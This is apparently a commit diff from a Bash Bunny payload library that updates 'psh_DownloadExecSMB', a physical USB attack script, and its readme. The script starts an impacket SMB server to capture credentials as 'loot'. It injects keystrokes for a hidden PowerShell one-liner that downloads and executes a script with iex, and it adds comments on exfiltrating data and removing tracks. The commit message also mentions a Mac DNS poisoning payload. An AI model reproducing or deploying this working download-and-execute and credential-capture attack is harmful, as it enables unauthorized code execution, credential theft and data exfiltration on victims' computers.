Update and fix payloads (#277)

* Updated all Payloads for Version 1.2+

Fixed Style Issues on extensions and payloads.
Added GET TARGET_OS to get.sh
Removed and Fixed all uses ducky_helper.sh (Issue #248)
Removed all mention of DUCKY_LANG (Issue #248)
Renamed Payloads with spaces in name
Added an extension to keep Macs Happy
Added a payload for Mac DNS poisoning
Fixed Issue #271 changed wget to curl -o
Implemented PR #268
Implemented PR #273

* Fixed e.cmd

* Fix e.cmd pt2

* Fixed Issues

Fixed issues pointed out by @sebkinne
Fixed styling errors

payloads/library/execution/psh_DownloadExecSMB/payload.txt

@@ -2,23 +2,23 @@
 #
 # Title:         Powershell Download and Execute SMB
 # Author:        LowValueTarget
-# Version:       1.2
+# Version:       2.0
 # Category:      Powershell
 # Target:        Windows XP SP3+ (Powershell)
 # Attackmodes:   HID, RNDIS_ETHERNET
 # Firmware:      >= 1.2
 #
-# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
-# Ensure psh.txt exists in payload directory  
+# Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Possibilities are limitless!
+# Credentials captured by  are stored as loot.
+# Ensure p.txt exists in payload directory  (using .txt instead of .ps1 in case of security countermeasures)
 #
-# Requires Impacket is installed (python ./impacket/setup.py install)  
+# Required tools: impacket
 #
 # | Attack Stage        | Description                   |
 # | ------------------- | ------------------------------|
 # | Stage 1             | Powershell                    |
 # | Stage 2             | Delivering powershell payload |
 #
-
 ATTACKMODE RNDIS_ETHERNET HID
 
 # SETUP
@@ -29,48 +29,48 @@ GET SWITCH_POSITION
 GET TARGET_HOSTNAME
 GET HOST_IP
 
+# DEFINE DIRECTORIES
 PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
-# Check for psh.txt
-if [ ! -f ${PAYLOAD_DIR}/psh.txt ]; then
+LOOTDIR_BB=/root/udisk/loot/psh_DownloadExecSMB
+
+mkdir -p /tmp/{l,p}
+
+# CHECK FOR POWERSHELL
+if [ ! -f ${PAYLOAD_DIR}/p.txt ]; then
     LED FAIL
     exit 1
 fi
-cp -R ${PAYLOAD_DIR}/* /tmp/
+cp -R ${PAYLOAD_DIR}/* /tmp/p/ # any additional assets will be available in tmp
 
-LOOTDIR=/root/udisk/loot/psh_DownloadExecSMB
-# Setup named logs in loot directory
-mkdir -p ${LOOTDIR}
+# GET HOSTNAME
 HOST=${TARGET_HOSTNAME}
-# If hostname is blank set it to "noname"
-[[ -z "$HOST" ]] && HOST="noname"
-COUNT=$(ls -lad ${LOOTDIR}/$HOST* | wc -l)
+[[ -z "${HOST}" ]] && HOST="noname"
+COUNT=$(ls -lad ${LOOTDIR_BB}/${HOST}* | wc -l)
 COUNT=$((COUNT+1))
-mkdir -p ${LOOTDIR}/${HOST}-$COUNT
+mkdir -p ${LOOTDIR_BB}/${HOST}-${COUNT}
+LOOTDIR_BB=${LOOTDIR_BB}/${HOST}-${COUNT}
 
-# Log file
-LOGFILE=psh_smb.log
+# START SMB SERVER
+LOGFILE=/tmp/l/psh_downloadsmb.log
+touch ${LOGFILE}
+python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp > ${LOGFILE} &
 
-# Start SMB Server
-mkdir -p /loot
-python /tools/impacket/examples/smbserver.py -comment 'Public Share' s /tmp/ > /loot/${LOGFILE} &
-
-# STAGE 1 - Powershell
+# STAGE 1 - POWERSHELL
 LED STAGE1
+RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
+# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
+# TIP: Remove tracks in the psh payload if you wish
 
-RUN WIN "powershell -WindowStyle Hidden \"while (\$true) { If ((New-Object net.sockets.tcpclient ($HOST_IP,445)).Connected) { iex (New-Object Net.WebClient).DownloadString('\\\\$HOST_IP\\s\\psh.txt');New-Item \\\172.16.64.1\\s\\COMPLETE -ItemType file;exit}}\""
-# Remove tracks in the psh payload if you wish
-
-# STAGE 2 - Wait until payload retrieved
-# Wait until payload is retrieved
+# STAGE 2 - HURRY UP AND WAIT
 LED STAGE2
 while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
 
 # CLEANUP
 LED CLEANUP
 
-# Move loot to mass storage
-mv /loot/${LOGFILE} ${LOOTDIR}/${HOST}-$COUNT
-rm /loot/${LOGFILE}
+# STASH THE LOOT
+mv /tmp/l/* ${LOOTDIR_BB}/
+rm -rf /tmp/{l,p}
 # Sync file system
 sync
 

payloads/library/execution/psh_DownloadExecSMB/readme.md

@@ -10,16 +10,20 @@
 
 ## Description
 
-Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. Credentials are stored as loot.  
+Quick HID attack to retrieve and run powershell payload from BashBunny SMBServer. SMB Credentials are stored as loot.  
 
 ## Configuration
 
-* Ensure psh.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
-* Requires Impacket is installed (python ./impacket/setup.py install)  
+* Ensure p.txt exists in payload directory. This is the powershell script that will be downloaded and executed.  
+* Requires Impacket
+
+__Installation__
+
+See Hak5's Tool Thread Here: https://forums.hak5.org/index.php?/topic/40971-info-tools/
 
 ## STATUS
 
 | Attack Stage        | Description                   |
 | ------------------- | ------------------------------|
 | Stage 1             | Powershell                    |
-| Stage 2             | Delivering powershell payload |
+| Stage 2             | Delivering powershell payload |